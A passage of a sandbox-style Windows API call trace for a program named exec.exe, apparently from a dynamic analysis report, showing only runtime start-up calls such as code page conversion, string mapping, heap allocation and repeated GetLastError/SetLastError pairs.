returned 1409 [0101.621] FreeEnvironmentStringsW (penv=0x334770) returned 1 [0101.621] GetLastError () returned 0x5 [0101.621] SetLastError (dwErrCode=0x5) [0101.621] GetLastError () returned 0x5 [0101.621] SetLastError (dwErrCode=0x5) [0101.621] GetLastError () returned 0x5 [0101.621] SetLastError (dwErrCode=0x5) [0101.621] GetACP () returned 0x4e4 [0101.621] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x0, Size=0x220) returned 0x181788 [0101.621] GetLastError () returned 0x5 [0101.621] SetLastError (dwErrCode=0x5) [0101.621] IsValidCodePage (CodePage=0x4e4) returned 1 [0101.621] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x31fc94 | out: lpCPInfo=0x31fc94) returned 1 [0101.621] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x31f760 | out: lpCPInfo=0x31f760) returned 1 [0101.621] GetLastError () returned 0x5 [0101.621] SetLastError (dwErrCode=0x5) [0101.621] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x31fb74, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0101.621] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x31fb74, cbMultiByte=256, lpWideCharStr=0x31f4d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0101.621] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x31f774 | out: lpCharType=0x31f774) returned 1 [0101.621] GetLastError () returned 0x5 [0101.621] SetLastError (dwErrCode=0x5) [0101.621] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x31fb74, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0101.622] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x31fb74, cbMultiByte=256, lpWideCharStr=0x31f4a8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㭪㘇骫ĂĀ") returned 256 [0101.622] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㭪㘇骫ĂĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0101.622] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㭪㘇骫ĂĀ", cchSrc=256, lpDestStr=0x31f298, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0101.622] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x31fa74, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x91\xda\xc8\xcd\xac\xfc\x31", lpUsedDefaultChar=0x0) returned 256 [0101.622] GetLastError () returned 0x5 [0101.622] SetLastError (dwErrCode=0x5) [0101.622] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x31fb74, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0101.622] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x31fb74, cbMultiByte=256, lpWideCharStr=0x31f4c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㭪㘇骫ĂĀ") returned 256 [0101.622] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㭪㘇骫ĂĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0101.622] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㭪㘇骫ĂĀ", cchSrc=256, lpDestStr=0x31f2b8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0101.622] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x31f974, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x91\xda\xc8\xcd\xac\xfc\x31", lpUsedDefaultChar=0x0) returned 256 [0101.622] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x102f728, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\exec.exe")) returned 0x34 [0101.622] GetLastError () returned 0x0 [0101.622] SetLastError (dwErrCode=0x0) [0101.622] GetLastError () returned 0x0 [0101.622] SetLastError (dwErrCode=0x0) [0101.622] GetLastError () returned 0x0 [0101.622] SetLastError (dwErrCode=0x0) [0101.622] GetLastError () returned 0x0 [0101.622] SetLastError (dwErrCode=0x0) [0101.623] GetLastError () returned 0x0 [0101.623] SetLastError (dwErrCode=0x0) [0101.623] GetLastError () returned 0x0 [0101.623] SetLastError (dwErrCode=0x0) [0101.623] GetLastError () returned 0x0 [0101.623] SetLastError (dwErrCode=0x0) [0101.623] GetLastError () returned 0x0 [0101.623] SetLastError (dwErrCode=0x0) [0101.623] GetLastError () returned 0x0 [0101.623] SetLastError (dwErrCode=0x0) [0101.623] GetLastError () returned 0x0 [0101.623] SetLastError (dwErrCode=0x0) [0101.623] GetLastError () returned 0x0 [0101.623] SetLastError (dwErrCode=0x0) [0101.623] GetLastError () returned 0x0 [0101.623] SetLastError (dwErrCode=0x0) [0101.623] GetLastError () returned 0x0 [0101.623] SetLastError (dwErrCode=0x0) [0101.623] GetLastError () returned 0x0 [0101.623] SetLastError (dwErrCode=0x0) [0101.623] GetLastError () returned 0x0 [0101.623] SetLastError (dwErrCode=0x0) [0101.623] GetLastError () returned 0x0 [0101.624] SetLastError (dwErrCode=0x0) [0101.624] GetLastError () returned 0x0 [0101.624] SetLastError (dwErrCode=0x0) [0101.624] GetLastError () returned 0x0 [0101.624] SetLastError (dwErrCode=0x0) [0101.624] GetLastError () returned 0x0 [0101.624] SetLastError (dwErrCode=0x0) [0101.624] GetLastError () returned 0x0 [0101.624] SetLastError (dwErrCode=0x0) [0101.624] GetLastError () returned 0x0 [0101.624] SetLastError (dwErrCode=0x0) [0101.624] GetLastError () returned 0x0 [0101.624] SetLastError (dwErrCode=0x0) [0101.624] GetLastError () returned 0x0 [0101.624] SetLastError (dwErrCode=0x0) [0101.624] GetLastError () returned 0x0 [0101.624] SetLastError (dwErrCode=0x0) [0101.624] GetLastError () returned 0x0 [0101.624] SetLastError (dwErrCode=0x0) [0101.624] GetLastError () returned 0x0 [0101.624] SetLastError (dwErrCode=0x0) [0101.624] GetLastError () returned 0x0 [0101.625] SetLastError (dwErrCode=0x0) [0101.625] GetLastError () returned 0x0 [0101.625] SetLastError (dwErrCode=0x0) [0101.625] GetLastError () returned 0x0 [0101.625] SetLastError (dwErrCode=0x0) [0101.625] GetLastError () returned 0x0 [0101.625] SetLastError (dwErrCode=0x0) [0101.625] GetLastError () returned 0x0 [0101.625] SetLastError (dwErrCode=0x0) [0101.625] GetLastError () returned 0x0 [0101.625] SetLastError (dwErrCode=0x0) [0101.625] GetLastError () returned 0x0 [0101.625] SetLastError (dwErrCode=0x0) [0101.625] GetLastError () returned 0x0 [0101.625] SetLastError (dwErrCode=0x0) [0101.625] GetLastError () returned 0x0 [0101.625] SetLastError (dwErrCode=0x0) [0101.625] GetLastError () returned 0x0 [0101.625] SetLastError (dwErrCode=0x0) [0101.625] GetLastError () returned 0x0 [0101.625] SetLastError (dwErrCode=0x0) [0101.625] GetLastError () returned 0x0 [0101.626] SetLastError (dwErrCode=0x0) [0101.626] GetLastError () returned 0x0 [0101.626] SetLastError (dwErrCode=0x0) [0101.626] GetLastError () returned 0x0 [0101.626] SetLastError (dwErrCode=0x0) [0101.626] GetLastError () returned 0x0 [0101.626] SetLastError (dwErrCode=0x0) [0101.626] GetLastError () returned 0x0 [0101.626] SetLastError (dwErrCode=0x0) [0101.626] GetLastError () returned 0x0 [0101.626] SetLastError (dwErrCode=0x0) [0101.626] GetLastError () returned 0x0 [0101.626] SetLastError (dwErrCode=0x0) [0101.626] GetLastError () returned 0x0 [0101.626] SetLastError (dwErrCode=0x0) [0101.626] GetLastError () returned 0x0 [0101.626] SetLastError (dwErrCode=0x0) [0101.626] GetLastError () returned 0x0 [0101.626] SetLastError (dwErrCode=0x0) [0101.626] GetLastError () returned 0x0 [0101.626] SetLastError (dwErrCode=0x0) [0101.626] GetLastError () returned 0x0 [0101.626] SetLastError (dwErrCode=0x0) [0101.626] GetLastError () returned 0x0 [0101.626] SetLastError (dwErrCode=0x0) [0101.626] GetLastError () returned 0x0 [0101.627] SetLastError (dwErrCode=0x0) [0101.627] GetLastError () returned 0x0 [0101.627] SetLastError (dwErrCode=0x0) [0101.627] GetLastError () returned 0x0 [0101.627] SetLastError (dwErrCode=0x0) [0101.627] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x0, Size=0x3d) returned 0x1819b0 [0101.627] GetLastError () returned 0x0 [0101.627] SetLastError (dwErrCode=0x0) [0101.627] GetLastError () returned 0x0 [0101.627] SetLastError (dwErrCode=0x0) [0101.627] GetLastError () returned 0x0 [0101.627] SetLastError (dwErrCode=0x0) [0101.627] GetLastError () returned 0x0 [0101.627] SetLastError (dwErrCode=0x0) [0101.627] GetLastError () returned 0x0 [0101.627] SetLastError (dwErrCode=0x0) [0101.627] GetLastError () returned 0x0 [0101.627] SetLastError (dwErrCode=0x0) [0101.627] GetLastError () returned 0x0 [0101.627] SetLastError (dwErrCode=0x0) [0101.627] GetLastError () returned 0x0 [0101.627] SetLastError (dwErrCode=0x0) [0101.627] GetLastError () returned 0x0 [0101.628] SetLastError (dwErrCode=0x0) [0101.628] GetLastError () returned 0x0 [0101.628] SetLastError (dwErrCode=0x0) [0101.628] GetLastError () returned 0x0 [0101.628] SetLastError (dwErrCode=0x0) [0101.628] GetLastError () returned 0x0 [0101.628] SetLastError (dwErrCode=0x0) [0101.628] GetLastError () returned 0x0 [0101.628] SetLastError (dwErrCode=0x0) [0101.628] GetLastError () returned 0x0 [0101.628] SetLastError (dwErrCode=0x0) [0101.628] GetLastError () returned 0x0 [0101.628] SetLastError (dwErrCode=0x0) [0101.628] GetLastError () returned 0x0 [0101.628] SetLastError (dwErrCode=0x0) [0101.628] GetLastError () returned 0x0 [0101.628] SetLastError (dwErrCode=0x0) [0101.628] GetLastError () returned 0x0 [0101.628] SetLastError (dwErrCode=0x0) [0101.628] GetLastError () returned 0x0 [0101.628] SetLastError (dwErrCode=0x0) [0101.628] GetLastError () returned 0x0 [0101.628] SetLastError (dwErrCode=0x0) [0101.628] GetLastError () returned 0x0 [0101.629] SetLastError (dwErrCode=0x0) [0101.629] GetLastError () returned 0x0 [0101.629] SetLastError (dwErrCode=0x0) [0101.629] GetLastError () returned 0x0 [0101.629] SetLastError (dwErrCode=0x0) [0101.629] GetLastError () returned 0x0 [0101.629] SetLastError (dwErrCode=0x0) [0101.629] GetLastError () returned 0x0 [0101.629] SetLastError (dwErrCode=0x0) [0101.629] GetLastError () returned 0x0 [0101.629] SetLastError (dwErrCode=0x0) [0101.629] GetLastError () returned 0x0 [0101.629] SetLastError (dwErrCode=0x0) [0101.629] 